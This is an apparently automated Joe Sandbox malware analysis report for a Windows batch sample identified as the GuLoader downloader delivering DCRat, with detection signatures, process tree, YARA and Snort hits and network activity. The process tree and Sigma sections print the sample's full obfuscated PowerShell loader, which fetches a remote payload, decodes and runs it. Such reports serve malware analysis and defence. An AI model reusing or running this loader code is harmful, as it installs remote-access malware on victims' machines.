Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
las.cmd

Overview

General Information

Sample name:las.cmd
Analysis ID:1446773
MD5:1b315096e07f2cbe4bb1dae37bf115e5
SHA1:183d4109803b7de7f8c679e5cf12d215bd6b3871
SHA256:e199e310df7ed728f62ded7f850def8787e53b2e35a3534d20409976dfa87728
Tags:cmd
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 3224 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\las.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6100 cmdline: powershell.exe -windowstyle hidden "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublue Potes Dd.a]Mic,o=Kauti$ ShipG RegiiSamleaLyasen CycltCr pihBrockoExpuloRide,dV,cif ');$Squarsonry=Forfladigelsens 'Damps$ PrivSGendrmPh.nep UnsniNeu os TrultAfgrio EleclSyntaebarstrGe.chnFurfueFa cr.MissaD KostoSv.jfwRigsanGluemlUlfbjoCupolaAarskdproroFHoreqiTrappl StemeK,nto(Howls$ UngaR.ositaProtudSkidseen,lerRetsmn s,ineEschesB.ast,Priva$Em erGDesidoParocoBi.lid BuksbasconyBesg eSpins)s mle ';$Goodbye=$Tromlende[0];Inddatafiler223 (Forfladigelsens 'Be,hy$Hutl.gBeniglOve.soCamdebMogstapo.yglSensi:PalamI .hlonafstitIntraeHoatcrpethimLan,meAutodnVrdiesHollatTamoyrPenn uvengeuNonprm Lati5 Tigh3Flust=Ellio(Tira TBort,eKillisPlanltDries- KompPGulliaForbitSjaskhdynej Dibl,$ YikiGTjrekoPolsgo UdendPyramblsesayFlag.eC ole)Aft.e ');while (!$Intermenstruum53) {Inddatafiler223 (Forfladigelsens 'Chir,$ ibrogBli.zle,ektoSpadebSna.kaBoliglL nti:i ternJulemuPlatim Fi,tdRati.aNedfo=.iber$Anke.tChe.irbassiuSintre,orec ') ;Inddatafiler223 $Squarsonry;Inddatafiler223 (Forfladigelsens 'Anth,S Axunt Bak aKon,orEsop.tForsi-NonunSKrukkl.ntepeGrusveEnforpSkrue ,enne4Gangl ');Inddatafiler223 (Forfladigelsens 'Dosse$NaturgsuperlFibroo Met b Pu.laVulcal Torn: Upf,IS.rrenPolystSurfae NonsrBrusemFlydeeFrisenlandisFortrtPou rrS,aaluAp lluUniqumFiref5Burgj3,ncur= Grun(FondsTExcogeEn,elsStimetSpirk-underP CecaaForsatUltr h Par uansg$SelvaG DoleoSo,peo ,hardkommabinjoiyAfprieSkend)Chil, ') ;Inddatafiler223 (Forfladigelsens 'Crabl$vand.gHavnelslidsomanifb YderaFerielImmi.:klapnL C.amaBajadrTeknoy RabunBrugtg CurviFrimrtlysbeuTai psBerti= bra $.lanlgPolarl Repro R krbLivssaFordylStor :S,orkUMetacnInhalm TeleiTropes ,krotFilopaKancek S.skaIndrebBe ynlnazieeSub e+ugand+Supra%Fatn.$DefekU K idn Ven fTilfjoUnderrTrva,kGongleSpintdFgtemnTilt.eSerrasa,cons anon.Hulruc Mul.olametu Sil nBost,tTache ') ;$Radernes=$Unforkedness[$Laryngitus];}$Samojedens=284462;$Stabelstolen=28909;Inddatafiler223 (Forfladigelsens 'Thera$EksklgStikklP ppeoCharlb TriaaGran lKlipp:VarioA.etakcTube,rRo,usu Afgrxgond perli= P pe AconiG,quipe KemitGodk,- GregCSup ooep lonDucklt DomseRemolnCa,iltUn.er Boe,$Spor GRing oImpeto NewfdSuk.ebIntelyHofteeSl,mr ');Inddatafiler223 (Forfladigelsens 'Kanta$ FigggSmutvlDiamaoEnkelb .ushaUko rlLater:Sam eASagnenTjenet SkysiArtissRatoneTanz mF.ageiS,ibstDipetsDe,ar Unken= Alph Midda[DumheSVattey esmas Bi,tt Subme T.nemOut,l.DeterC Irraoyeme,n Cod.vindfle HaarrTorpetJe aa]Udste:Sys,o: CeilFSubphr S.peoCliv,mShib.B Udsta ChemsSomate G uc6,efra4LidleSMagiatCountr Arisi Ho pnAugusgS,jen(Stere$Far aAs bircUnknorDaktyu remaxRe,re)mouth ');Inddatafiler223 (Forfladigelsens 'nonph$TonesgTppeflv.lifoGummib Smr.aEp chlHe.lo:.ersoQPolysu P.oga Tubur.yreseHalftn RometHedonePerisn Q adeOtt n .ank=Ordbo Ik af[un urSSkrueyKaktusCo.dit Fer.eExophmMedde.maadeT JerseInterxIndhftAllio. ntenE CharnVrelscSminkoD.ivedScuddiBrnepnVejargenerv] Over:Jenna:BeregA Win,SmarthCSemifI .nknIEnebo. B.stGInopieAtelytApocoSA mlnt krarOversiChok,nCalamgPairm( D,ss$Pa phAWire nFinantHo ekiKi,desUn ueeepistmIndesiPapistmedlesNonp,) ecur ');Inddatafiler223 (Forfladigelsens 'Winep$ AfvrgUn,arlUddanoSpoejb .amiaChoktlskabe:TvrdrVMandoaB.bler AdvomA etotBroomv CribaEthalnSymbodBervesAmygdbSyddaaJac.rdBevgeeDis,iaForbrnDaases SdvatTelphaHi.selBe potK,adrebrambnGimle=Serie$AlcyoQOsmomuS,ksaaLegeor ObjeeAnthenHomott Bas,eRabatnJoenseKvote. Ush s I.dkuReddsb GhafsSmit.tStormrUn usiDrernn Unasg apit(Flusj$Meta SNummeaDeadpmDrag o ouvrjGer.ieClabudMorbre Stann,avnestunes,Subcu$r,velSen yst.stelaGlacibQ,eereRemonl Palms .andt multo B.rglSoereeV,jrsnUp.al)unsla ');Inddatafiler223 $Varmtvandsbadeanstalten;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5960 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7056 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublue Potes Dd.a]Mic,o=Kauti$ ShipG RegiiSamleaLyasen CycltCr pihBrockoExpuloRide,dV,cif ');$Squarsonry=Forfladigelsens 'Damps$ PrivSGendrmPh.nep UnsniNeu os TrultAfgrio EleclSyntaebarstrGe.chnFurfueFa cr.MissaD KostoSv.jfwRigsanGluemlUlfbjoCupolaAarskdproroFHoreqiTrappl StemeK,nto(Howls$ UngaR.ositaProtudSkidseen,lerRetsmn s,ineEschesB.ast,Priva$Em erGDesidoParocoBi.lid BuksbasconyBesg eSpins)s mle ';$Goodbye=$Tromlende[0];Inddatafiler223 (Forfladigelsens 'Be,hy$Hutl.gBeniglOve.soCamdebMogstapo.yglSensi:PalamI .hlonafstitIntraeHoatcrpethimLan,meAutodnVrdiesHollatTamoyrPenn uvengeuNonprm Lati5 Tigh3Flust=Ellio(Tira TBort,eKillisPlanltDries- KompPGulliaForbitSjaskhdynej Dibl,$ YikiGTjrekoPolsgo UdendPyramblsesayFlag.eC ole)Aft.e ');while (!$Intermenstruum53) {Inddatafiler223 (Forfladigelsens 'Chir,$ ibrogBli.zle,ektoSpadebSna.kaBoliglL nti:i ternJulemuPlatim Fi,tdRati.aNedfo=.iber$Anke.tChe.irbassiuSintre,orec ') ;Inddatafiler223 $Squarsonry;Inddatafiler223 (Forfladigelsens 'Anth,S Axunt Bak aKon,orEsop.tForsi-NonunSKrukkl.ntepeGrusveEnforpSkrue ,enne4Gangl ');Inddatafiler223 (Forfladigelsens 'Dosse$NaturgsuperlFibroo Met b Pu.laVulcal Torn: Upf,IS.rrenPolystSurfae NonsrBrusemFlydeeFrisenlandisFortrtPou rrS,aaluAp lluUniqumFiref5Burgj3,ncur= Grun(FondsTExcogeEn,elsStimetSpirk-underP CecaaForsatUltr h Par uansg$SelvaG DoleoSo,peo ,hardkommabinjoiyAfprieSkend)Chil, ') ;Inddatafiler223 (Forfladigelsens 'Crabl$vand.gHavnelslidsomanifb YderaFerielImmi.:klapnL C.amaBajadrTeknoy RabunBrugtg CurviFrimrtlysbeuTai psBerti= bra $.lanlgPolarl Repro R krbLivssaFordylStor :S,orkUMetacnInhalm TeleiTropes ,krotFilopaKancek S.skaIndrebBe ynlnazieeSub e+ugand+Supra%Fatn.$DefekU K idn Ven fTilfjoUnderrTrva,kGongleSpintdFgtemnTilt.eSerrasa,cons anon.Hulruc Mul.olametu Sil nBost,tTache ') ;$Radernes=$Unforkedness[$Laryngitus];}$Samojedens=284462;$Stabelstolen=28909;Inddatafiler223 (Forfladigelsens 'Thera$EksklgStikklP ppeoCharlb TriaaGran lKlipp:VarioA.etakcTube,rRo,usu Afgrxgond perli= P pe AconiG,quipe KemitGodk,- GregCSup ooep lonDucklt DomseRemolnCa,iltUn.er Boe,$Spor GRing oImpeto NewfdSuk.ebIntelyHofteeSl,mr ');Inddatafiler223 (Forfladigelsens 'Kanta$ FigggSmutvlDiamaoEnkelb .ushaUko rlLater:Sam eASagnenTjenet SkysiArtissRatoneTanz mF.ageiS,ibstDipetsDe,ar Unken= Alph Midda[DumheSVattey esmas Bi,tt Subme T.nemOut,l.DeterC Irraoyeme,n Cod.vindfle HaarrTorpetJe aa]Udste:Sys,o: CeilFSubphr S.peoCliv,mShib.B Udsta ChemsSomate G uc6,efra4LidleSMagiatCountr Arisi Ho pnAugusgS,jen(Stere$Far aAs bircUnknorDaktyu remaxRe,re)mouth ');Inddatafiler223 (Forfladigelsens 'nonph$TonesgTppeflv.lifoGummib Smr.aEp chlHe.lo:.ersoQPolysu P.oga Tubur.yreseHalftn RometHedonePerisn Q adeOtt n .ank=Ordbo Ik af[un urSSkrueyKaktusCo.dit Fer.eExophmMedde.maadeT JerseInterxIndhftAllio. ntenE CharnVrelscSminkoD.ivedScuddiBrnepnVejargenerv] Over:Jenna:BeregA Win,SmarthCSemifI .nknIEnebo. B.stGInopieAtelytApocoSA mlnt krarOversiChok,nCalamgPairm( D,ss$Pa phAWire nFinantHo ekiKi,desUn ueeepistmIndesiPapistmedlesNonp,) ecur ');Inddatafiler223 (Forfladigelsens 'Winep$ AfvrgUn,arlUddanoSpoejb .amiaChoktlskabe:TvrdrVMandoaB.bler AdvomA etotBroomv CribaEthalnSymbodBervesAmygdbSyddaaJac.rdBevgeeDis,iaForbrnDaases SdvatTelphaHi.selBe potK,adrebrambnGimle=Serie$AlcyoQOsmomuS,ksaaLegeor ObjeeAnthenHomott Bas,eRabatnJoenseKvote. Ush s I.dkuReddsb GhafsSmit.tStormrUn usiDrernn Unasg apit(Flusj$Meta SNummeaDeadpmDrag o ouvrjGer.ieClabudMorbre Stann,avnestunes,Subcu$r,velSen yst.stelaGlacibQ,eereRemonl Palms .andt multo B.rglSoereeV,jrsnUp.al)unsla ');Inddatafiler223 $Varmtvandsbadeanstalten;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 5800 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 6120 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_DCRat_1aeea1acunknownunknown
  • 0xb55d0:$b2: DcRat By qwqdanchun1

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2447508436.00000000086D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000009.00000002.3255609581.0000000020F51000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_DCRat_1aeea1acunknownunknown
    • 0x2dcef:$b2: DcRat By qwqdanchun1
    00000009.00000002.3255609581.0000000021160000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_DCRat_1aeea1acunknownunknown
    • 0x34ef:$b2: DcRat By qwqdanchun1
    • 0x8317:$b2: DcRat By qwqdanchun1
    • 0x855b:$b2: DcRat By qwqdanchun1
    00000006.00000002.2441971801.0000000005E95000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000009.00000002.3240609884.00000000053C8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_DCRat_1aeea1acunknownunknown
      • 0x132cf:$b2: DcRat By qwqdanchun1
      Click to see the 8 entries

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_6100.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        amsi32_7056.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xe11b:$b2: ::FromBase64String(
        • 0xd1f6:$s1: -join
        • 0x69a2:$s4: +=
        • 0x6a64:$s4: +=
        • 0xac8b:$s4: +=
        • 0xcda8:$s4: +=
        • 0xd092:$s4: +=
        • 0xd1d8:$s4: +=
        • 0x1714b:$s4: +=
        • 0x171cb:$s4: +=
        • 0x17291:$s4: +=
        • 0x17311:$s4: +=
        • 0x174e7:$s4: +=
        • 0x1756b:$s4: +=
        • 0xd9c9:$e4: Get-WmiObject
        • 0xdbb8:$e4: Get-Process
        • 0xdc10:$e4: Start-Process
        • 0x15c69:$e4: Get-Process

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublue Potes Dd.a]Mic,o=Kauti$ ShipG RegiiSamleaLyase

        Snort Signatures

        Timestamp:05/23/24-21:01:07.383835
        SID:2052265
        Source Port:8890
        Destination Port:62798
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/23/24-21:01:07.383835
        SID:2848152
        Source Port:8890
        Destination Port:62798
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for URL or domain
        Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability
        Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.5:62796 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.5:62797 version: TLS 1.2
        Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2443760561.0000000007473000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000006.00000002.2443760561.00000000074E0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ion.pdb source: powershell.exe, 00000006.00000002.2443760561.0000000007450000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: m.Core.pdbL source: powershell.exe, 00000006.00000002.2443760561.0000000007473000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: em.Core.pdbk source: powershell.exe, 00000006.00000002.2443760561.0000000007450000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: em.Core.pdb source: powershell.exe, 00000006.00000002.2443760561.0000000007450000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

        Networking

        barindex
        Snort IDS alert for network traffic
